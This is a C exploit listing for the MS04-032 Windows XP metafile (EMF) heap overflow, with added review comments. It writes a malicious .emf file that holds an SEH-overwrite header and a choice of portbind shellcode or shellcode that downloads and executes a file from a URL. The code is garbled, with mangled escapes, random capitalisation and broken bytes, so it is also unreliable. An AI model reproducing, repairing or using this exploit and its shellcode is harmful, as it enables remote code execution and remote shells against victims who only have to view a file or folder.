[Expl] (MS04-032) Microsoft Windows XP Metafile (.EMF) Heap
/* HOD-ms04032-emf-expl2.c:
*
* (MS04-032) Microsoft Windows XP Metafile (.EMF) Heap Overflow
*
* Exploit version 0.2 (public) coded
*
*
*.: [Houseofdabus]:.
*
*
* [At inbox dot RU]
*-------------------------------------------------------------------
* About WMF/EMF:
* Windows Metafile (WMF) and Enhanced Windows Metafile (EMF) formats
* are vector files that can contain a raster image...
*
*-------------------------------------------------------------------
* The vulnerability will be triggered by either viewing a malicious
* file or by navigating to a directory which contains a malicious
* file and displays it as a thumbnail.
*
* Graphics Rendering Engine Vulnerability - CAN-2004-0209
*-------------------------------------------------------------------
* Tested on:
* - Internet Explorer 6.0 (SP1) (iexplore.exe)
* - Explorer (explorer.exe)
* - Windows XP SP1
*
*-------------------------------------------------------------------
* Compile:
* Win32/VC++: cl HOD-ms04032-emf-expl.c
* Win32/cygwin: gcc HOD-ms04032-emf-expl.c -lws2_32.lib
* Linux: gcc -o HOD-ms04032-emf-expl HOD-ms04032-emf-expl.c
*
*-------------------------------------------------------------------
* Command line parameters/arguments:
*
* hod.exe <file> <shellcode> <bind/connectback port> [connectback IP]
*
* Shellcode:
* 1-portbind shellcode
* 2-connectback shellcode
*
*-------------------------------------------------------------------
* Examples:
*
* C:\> HOD-ms04032-emf-expl.exe expl.emf 1 7777
*
* C:\> HOD-ms04032-emf-expl.exe expl.emf 2 http://host/file.exe
*
*-------------------------------------------------------------------
*
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission to
* do so.
*
*/
/* #define _WIN32 */
# Include <stdio. h>
# Include <stdlib. h>
# Include <string. h>
# Ifdef _ Win32
# Pragma comment (Lib, "ws2_32 ")
# Include <winsock2.h>
# Else
# Include <sys/types. h>
# Include <netinet/in. h>
# Include <sys/socket. h>
# Endif
# Include <windows. h>
/*
 * Bytes written first to the output file (main writes
 * sizeof(emfheader)-1 of them): an ENHMETAHEADER followed by what
 * should be the first EMF record but is not one.
 *
 * NOTE(review): every escape in this listing is garbled ("/x.." instead
 * of "\x..", mixed case) and the fourth line holds only 15 bytes, so the
 * array does not compile as shown; read the values as indicative only.
 *
 * What can be read off it: iType = 1 (EMR_HEADER) and nSize = 0x40 in
 * the first two dwords, the " EMF" signature (0x20 0x45 0x4d 0x46) at
 * offset 40 where dSignature belongs, then nBytes = 0x40 and
 * nRecords = 0x0b after the version dword - nBytes is smaller than the
 * file main actually writes.  The 16 bytes after the 64-byte header are
 * not a record (their first dword is not any EMR_* type): per the
 * author's notes and the opcode bytes they appear to be a short jump
 * plus NOP padding, a call gadget address and the address of the top
 * SEH handler on XP SP1.  A defensive EMF parser should verify that
 * every record's iType is a known type and that nSize is at least 8
 * and within the remaining file before reading the record body.
 */
Unsigned char emfheader [] =
"/X01/x00/x00/x00/X40/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/X20/x00/x00/x00/x20/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/X4c/x03/x00/x00/x4c/x03/x00/x00/x20/x45/x4d/X46/x00/x00/x01/x00"
"/X40/x00/x00/x00/x0b/x00/x00/x00/x0a/x00/x00/x00/xFF/x00/x00"
"/Xeb/X12/x90/x90/x90/x90/x90/x90"
"/X9e/x5c/x05/x78"/* author's note: call [edi+0x74] gadget in rpcrt4.dll */
"/Xb4/x73/xed/x77";/* author's note: top SEH handler address, XP SP1 */
Unsigned char portbind_ SC [] =
"/X90/x90/x90/x90/x90/x90/x90/x90"
"/Xeb/x03/x5d/xeb/x05/xe8/xf8/xFF"
"/XFF/x8b/xc5/x83/xc0/X11/x33/xc9/x66/xb9/xc9/x01/X80/x30/x88"
"/X40/xe2/xfa/xdd/x03/x64/x03/x7c/x09/x64/x08/x88/x88/x88/X60/xc4"
"/X89/x88/x88/x01/xce/x74/x77/xfe/x74/xe0/x06/xc6/x86/x64/X60/xd9"
"/X89/x88/x88/x01/xce/x4e/xe0/xbb/Xba/x88/x88/xe0/xFF/xfb/Xba/xd7"
"/Xdc/x77/xde/x4e/x01/xce/x77/xfe/x74/xe0/x25/x51/x8d/X46/X60"
"/Xb8/x89/x88/x88/x01/xce/x5a/x77/xfe/x74/xe0/xfa/x76/x3b/x9e/X60"
"/XA8/x89/x88/x88/x01/xce/X46/x77/xfe/x74/xe0/x67/X46/x68/xe8/X60"
"/X98/x89/x88/x88/x01/xce/x42/x77/xfe/a35/ xe0/x43/X65/x74/xb3/X60"
"/X88/x89/x88/x88/x01/xce/x7c/x77/xfe/XI/xe0/x51/x81/x7d/x25/X60"
"/X78/x88/x88/x88/x01/xce/x78/x77/xfe/x86/xe0/x2c/x92/xf8/x4f/X60"
"/X68/x88/x88/x88/x01/xce/x64/x77/xfe/x86/xe0/x2c/x25/xA6/x61/X60"
"/X58/x88/x88/x88/x01/xce/X60/x77/xfe/a35/ xe0/x6d/xc1/x0e/xc1/X60"
"/X48/x88/x88/x88/x01/xce/x6a/x77/xfe/a35/ xe0/x6f/xf1/x4e/xf1/X60"
"/X38/x88/x88/x88/x01/xce/x5e/xbb/x77/x09/x64/x7c/x89/x88/x88/xdc"
"/Xe0/x89/x89/x88/x88/x77/xde/x7c/xd8/xd8/xd8/xd8/xc8/xd8/xc8/xd8"
"/X77/xde/x78/x03/x50/xdf/xe0/x8a/x88/XAB/x6f/x03/x44/xe2/x9e"
"/Xd9/XDB/x77/xde/x64/xdf/XDB/x77/xde/X60/xbb/x77/xdf/xd9/XDB/x77"
"/Xde/x6a/x03/x58/x01/xce/x36/xe0/xeb/xe5/xec/x88/x01/xee/x4a/x0b"
"/X4c/x24/x05/xb4/xac/xbb/x48/xbb/x41/x08/x49/x9d/x23/x6a/x75/x4e"
"/Xcc/xac/x98/Xcc/x76/Xcc/xac/xb5/x01/xdc/xac/xc0/x01/xdc/xac/xc4"
"/X01/xdc/xac/xd8/x05/Xcc/xac/x98/xdc/xd8/xd9/xd9/xd9/xc9/xd9/xc1"
"/Xd9/xd9/x77/xfe/x4a/xd9/x77/xde/X46/x03/x44/xe2/x77/x77/xb9/x77"
"/Xde/x5a/x03/X40/x77/xfe/x36/x77/xde/x5e/x63/x16/x77/xde/x9c/xde"
"/Xec/x29/xb8/x88/x88/x88/x03/xc8/x84/x03/xf8/x94/x25/x03/xc8/X80"
"/Xd6/x4a/x8c/x88/XDB/xdd/xde/xdf/x03/xe4/xac/x90/x03/XCD/xb4/x03"
"/Xdc/x8d/xf0/x8b/x5d/x03/xc2/x90/x03/xd2/xA8/x8b/x55/x6b/Xba/xc1"
"/X03/xbc/x03/x8b/x7d/xbb/x77/x74/xbb/x48/x24/XB2/x4c/xfc/x8f/x49"
"/X47/x85/x8b/x63/x7a/xb3/xf4/xac/x9c/XFD/x69/x03/xd2/xac/x8b"
"/X55/xee/x03/x84/xc3/x03/xd2/x94/x8b/x55/x03/x8c/x03/x8b/x4d/x63"
"/X8a/xbb/x48/x03/x5d/xd7/xd6/xd5/xD3/x4a/x8c/x88 ";
Unsigned char download_ SC [] =
"/X90/x90/x90/x90/x90/x90/x90/x90"
"/Xeb/x0f/x58/X80/x30/x17/X40/x81/x38/x6d/x30/x30/X21/x75/xf4"
"/Xeb/x05/xe8/xec/xFF/xfe/x94/x16/x17/x17/x4a/x42/X26"
"/Xcc/x73/x9c/x14/x57/x84/x9c/x54/xe8/x57/x62/xee/x9c/x44/x14"
"/X71/X26/xc5/x71/xaf/x17/x07/x71/x96/x2d/x5a/x4d/x63/x10/x3e"
"/Xd5/xfe/xe5/xe8/xe8/xe8/x9e/xc4/x9c/x6d/x2b/x16/xc0/x14/x48"
"/X6f/x9c/x5c/x0f/x9c/x64/x37/x9c/x6c/x33/x16/xc1/x16/xc0/xeb"
"/Xba/x16/xc7/x81/x90/xea/X46/X26/xde/x97/xd6/X18/xe4/xb1/X65"
"/X1d/x81/x4e/x90/xea/x63/x05/x50/x50/xf5/xf1/xa9/X18/x17/x17"
"/X17/x3e/xd9/x3e/xe0/xfe/xFF/xe8/xe8/xe8/X26/xd7/x71/x9c/x10"
"/Xd6/xf7/x15/x9c/x64/x0b/x16/xc1/x16/XD1/Xba/x16/xc7/x9e/XD1"
"/X9e/xc0/x4a/x9a/x92/xb7/x17/x17/x17/x57/x97/x2f/x16/x62/xed"
"/XD1/x17/x17/x9a/x92/x0b/x17/x17/x17/x47/X40/xe8/xc1/x7f/x13"
"/X17/x17/x17/x7f/x17/x07/x17/x17/x7f/x68/x81/x8f/x17/x7f/x17"
"/X17/x17/x17/xe8/xc7/x9e/x92/x9a/x17/x17/x17/x9a/x92/X18/x17"
"/X17/x17/x47/X40/xe8/xc1/X40/x9a/x9a/x42/x17/x17/x17/X46/xe8"
"/Xc7/x9e/xd0/x9a/x92/x4a/x17/x17/x17/x47/X40/xe8/xc1/X26/xde"
"/X46/X46/X46/X46/X46/xe8/xc7/x9e/xd4/x9a/x92/x7c/x17/x17/x17"
"/X47/X40/xe8/xc1/X26/xde/X46/X46/X46/X46/x9a/x82/xB6/x17/x17"
"/X17/x45/x44/xe8/xc7/x9e/xd4/x9a/x92/x6b/x17/x17/x17/x47/X40"
"/Xe8/xc1/x9a/x9a/x86/x17/x17/x17/X46/x7f/x68/x81/x8f/x17/xe8"
"/Xa2/x9a/x17/x17/x17/x44/xe8/xc7/x48/x9a/x92/x3e/x17/x17/x17"
"/X47/X40/xe8/xc1/x7f/x17/x17/x17/x17/x9a/x8a/x82/x17/x17/x17"
"/X44/xe8/xc7/x9e/xd4/x9a/x92/X26/x17/x17/x17/x47/X40/xe8/xc1"
"/Xe8/xa2/x86/x17/x17/x17/xe8/xa2/x9a/x17/x17/x17/x44/xe8/xc7"
"/X9a/x92/x2e/x17/x17/x17/x47/X40/xe8/xc1/x44/xe8/xc7/x9a/x92"
"/X56/x17/x17/x17/x47/X40/xe8/xc1/x7f/X12/x17/x17/x17/x9a/x9a"
"/X82/x17/x17/x17/X46/xe8/xc7/x9a/x92/x5e/x17/x17/x17/x47/X40"
"/Xe8/xc1/x7f/x17/x17/x17/x17/xe8/xc7/xFF/x6f/xe9/xe8/xe8/x50"
"/X72/x63/x47/X65/x78/x74/x56/x73/x73/X65/x72/x64/x64/x17/x5b"
"/X78/x76/x73/x5b/x7e/x75/X65/x76/X65/x6e/x56/x17/x41/x7e/X65"
"/X63/x62/x76/x7b/x56/x7b/x7b/x78/x74/x17/x48/x7b/x74/X65/x72"
"/X76/x63/x17/x48/x7b/X60/X65/x7e/x63/x72/x17/x48/x7b/x74/x7b"
"/X78/x64/x72/x17/X40/x7e/x79/X52/x6f/x72/x74/x17/X52/x6f/x7e"
"/X63/x47/X65/x78/x74/x72/x64/x64/x17/X40/x7e/x79/x5e/x79/x72"
"/X63/x17/x5e/x79/x63/x72/X65/x79/x72/x63/x58/x67/x72/x79/x56"
"/X17/x5e/x79/x63/x72/X65/x79/x72/x63/x58/x67/x72/x79/x42/X65"
"/X7b/x56/x17/x5e/x79/x63/x72/X65/x79/x72/x63/x45/x72/x76/x73"
"/X51/x7e/x7b/x72/x17/x17/x17/x17/x17/x17/x17/x7a/x27"
"/X27/x39/x72/x6f/x72/x17" "hod"/X21 ";
/* Four zero bytes that main appends as the last 4 bytes of the output file, after the payload. */
Unsigned char endoffile [] = "/x00/x00/x00/x00 ";
/*
 * Prints the command-line help and terminates the process.
 *
 * prog: argv[0], echoed into the usage line.
 *
 * NOTE(review): reached on every bad command line (see main) yet exits
 * with status 0, so a calling script cannot tell "help printed" from
 * success; exit(1) would be the conventional status here.  The "/N"
 * and "/n" in the strings are a garbled "\n" in this listing.
 */
Void
Usage (char * prog)
{
Printf ("Usage:/N ");
Printf ("% S <File> <shellcode> <bindport/URL>/N", prog );
Printf ("/nshellcode:/N ");
Printf ("1-portbind shellcode/N ");
Printf ("2-download & exec shellcode/n ");
Exit (0 );
}
/*
 * Entry point: writes argv[1] as an EMF file made of emfheader, then the
 * payload selected by argv[2] (1 = portbind_SC with the port from argv[3]
 * patched in, 2 = download_SC followed by the URL from argv[3] and a
 * one-byte terminator), then the four endoffile bytes.  Returns 0 on
 * success and also exits 0 on every error path (usage(), fopen failure),
 * which is a defect for callers that check the status.
 *
 * NOTE(review): the listing is case- and escape-garbled; beyond that,
 * the `(SC> 2) | (SC <1)` test lacks its outer parentheses and uses `|`
 * where `||` is presumably meant, and `If (FP = NULL)` / `If (SC = 1)`
 * are assignments where `==` is presumably meant.  No fwrite() or
 * fclose() return value is checked, so a short write (disk full,
 * unwritable path) is still reported as "[+] OK".
 */
Int
Main (INT argc, char ** argv)
{
/* terminator byte written after the URL in mode 2 ('\x01', garbled here) */
Char endofurl = '/x01 ';
Unsigned short port;
Int SC;
File * FP;
Printf ("/N (MS04-032) Microsoft Windows XP Metafile
(. EMF) Heap Overflow/n ");
Printf ("--- coded by.: [houseofdabus]:. ---/n ");
/* needs <file> <shellcode> <bindport/URL>; usage() does not return */
If (argc <4) usage (argv [0]);
/* atoi() yields 0 for non-numeric input, which the range check rejects */
SC = atoi (argv [2]);
If (SC> 2) | (SC <1) usage (argv [0]);
/* binary mode: the payload holds raw bytes such as 0x0a that text mode would translate on Windows */
Fp = fopen (argv [1], "WB ");
If (FP = NULL ){
Printf ("[-] error: CAN/'t Create File: % s/n", argv [1]);
Exit (0 );
}
/* Header: ENHMETAHEADER plus the fake first record; -1 drops the literal's NUL */
Fwrite (emfheader, 1, sizeof (emfheader)-1, FP );
Printf ("[*] shellcode :");
If (SC = 1 ){
/* mode 1: port from argv[3]; no range check, so non-numeric or >65535 input is silently truncated */
Port = atoi (argv [3]);
Printf ("portbind, Port = % u/N", Port );
/* XOR-encoded with 0x8888 and converted to network order, then patched
 * over the two bytes at offset 266 of portbind_SC; the key presumably
 * matches the decoder at the start of that array (inferred - verify) */
Port = htons (Port ^ (unsigned short) 0x8888 );
Memcpy (portbind_ SC + 266, & Port, 2 );
Fwrite (portbind_ SC, 1, sizeof (portbind_ SC)-1, FP );
Fwrite (endoffile, 1, 4, FP );
}
Else {
/* mode 2: download_SC, then the URL bytes verbatim (length not bounded here), the terminator, then the trailer */
Printf ("download & exec, url = % s/n", argv [3]);
Fwrite (download_ SC, 1, sizeof (download_ SC)-1,
FP );
Fwrite (argv [3], 1, strlen (argv [3]), FP );
Fwrite (& endofurl, 1, 1, FP );
Fwrite (endoffile, 1, 4, FP );
}
Printf ("[+] OK/N ");
/* return value unchecked: a failed flush on close goes unreported */
Fclose (FP );
Return 0;
}